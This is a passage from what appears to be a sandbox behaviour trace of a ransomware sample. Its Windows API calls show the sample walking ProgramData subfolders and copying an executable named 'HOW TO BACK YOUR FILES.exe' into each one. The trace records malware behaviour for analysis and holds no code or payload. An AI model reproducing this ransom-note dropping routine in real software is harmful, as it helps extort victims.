lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.306] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Event Viewer\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x4c6cdfe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c6cdfe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.306] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.306] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.306] lstrcpyW (in: lpString1=0x2cce476, lpString2="Views" | out: lpString1="Views") returned="Views" [0090.306] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0090.306] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x82) returned 0x2e95b0 [0090.306] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7cb0 [0090.306] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Event Viewer\\Views", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Event Viewer\\Views") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Event Viewer\\Views" [0090.306] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0090.306] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0090.306] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Event Viewer\\Views") returned 64 [0090.306] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Event Viewer\\Views" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Event Viewer\\Views") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Event Viewer\\Views" [0090.307] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.307] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Event Viewer\\Views\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\event viewer\\views\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.307] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.307] GetLastError () returned 0x0 [0090.307] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.307] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.307] CloseHandle (hObject=0x120) returned 1 [0090.307] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.307] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.308] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Event Viewer\\Views\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x4c6cdfe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c6cdfe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.308] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.308] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.308] lstrcpyW (in: lpString1=0x2cce482, lpString2="ApplicationViewsRootNode" | out: lpString1="ApplicationViewsRootNode") returned="ApplicationViewsRootNode" [0090.308] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0090.308] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb4) returned 0x2f2fc8 [0090.308] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7cb0 [0090.308] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode" [0090.308] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2fc8 | out: hHeap=0x2b0000) returned 1 [0090.308] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0090.308] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode") returned 89 [0090.308] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode" [0090.308] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.308] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\event viewer\\views\\applicationviewsrootnode\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.309] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.309] GetLastError () returned 0x0 [0090.309] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.309] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.309] CloseHandle (hObject=0x120) returned 1 [0090.309] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.309] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.309] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x4c6cdfe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c6cdfe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.309] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.309] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.309] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\eHome", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\eHome") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\eHome" [0090.310] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4780 | out: hHeap=0x2b0000) returned 1 [0090.310] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0090.310] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\eHome") returned 51 [0090.310] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\eHome" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\eHome") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\eHome" [0090.310] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.310] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\eHome\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\ehome\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.310] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.310] GetLastError () returned 0x0 [0090.310] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.310] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.311] CloseHandle (hObject=0x120) returned 1 [0090.311] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.311] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.311] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\eHome\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x4c6f4140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c6f4140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.311] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.311] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.311] lstrcpyW (in: lpString1=0x2cce468, lpString2="logs" | out: lpString1="logs") returned="logs" [0090.311] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0090.311] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x72) returned 0x2c1788 [0090.311] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7bd0 [0090.311] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\eHome\\logs", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\eHome\\logs") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\eHome\\logs" [0090.311] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1788 | out: hHeap=0x2b0000) returned 1 [0090.311] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0090.311] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\eHome\\logs") returned 56 [0090.311] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\eHome\\logs" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\eHome\\logs") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\eHome\\logs" [0090.311] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.311] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\eHome\\logs\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\ehome\\logs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.312] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.312] GetLastError () returned 0x0 [0090.312] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.312] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.312] CloseHandle (hObject=0x120) returned 1 [0090.312] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.312] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.312] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\eHome\\logs\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x4c71a2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c71a2a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.312] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.312] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.313] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\DRM", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\DRM") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\DRM" [0090.313] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0090.313] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0090.313] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\DRM") returned 49 [0090.313] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\DRM" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\DRM") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\DRM" [0090.313] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.313] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\DRM\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\drm\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.313] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.313] GetLastError () returned 0x0 [0090.313] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.314] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.314] CloseHandle (hObject=0x120) returned 1 [0090.314] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.314] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.314] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\DRM\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c71a2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c71a2a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.314] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.314] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.314] lstrcpyW (in: lpString1=0x2cce464, lpString2="Server" | out: lpString1="Server") returned="Server" [0090.314] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0090.314] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x72) returned 0x2c1788 [0090.314] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7b70 [0090.314] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\DRM\\Server", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\DRM\\Server") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\DRM\\Server" [0090.314] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1788 | out: hHeap=0x2b0000) returned 1 [0090.314] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0090.314] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\DRM\\Server") returned 56 [0090.314] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\DRM\\Server" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\DRM\\Server") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\DRM\\Server" [0090.314] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.314] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\DRM\\Server\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\drm\\server\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.315] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.315] GetLastError () returned 0x0 [0090.315] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.315] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.315] CloseHandle (hObject=0x120) returned 1 [0090.315] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.315] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.315] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\DRM\\Server\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c71a2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c71a2a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.316] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.316] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.316] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\DeviceSync", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\DeviceSync") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\DeviceSync" [0090.316] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1708 | out: hHeap=0x2b0000) returned 1 [0090.316] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0090.316] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\DeviceSync") returned 56 [0090.316] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\DeviceSync" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\DeviceSync") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\DeviceSync" [0090.316] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.316] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\DeviceSync\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\devicesync\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.316] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.317] GetLastError () returned 0x0 [0090.317] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.317] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.317] CloseHandle (hObject=0x120) returned 1 [0090.317] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.317] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.317] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\DeviceSync\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c740400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c740400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.317] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.317] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.317] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage" [0090.317] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1408 | out: hHeap=0x2b0000) returned 1 [0090.317] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0090.317] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage") returned 58 [0090.317] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage" [0090.317] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.317] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Device Stage\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\device stage\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.318] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.318] 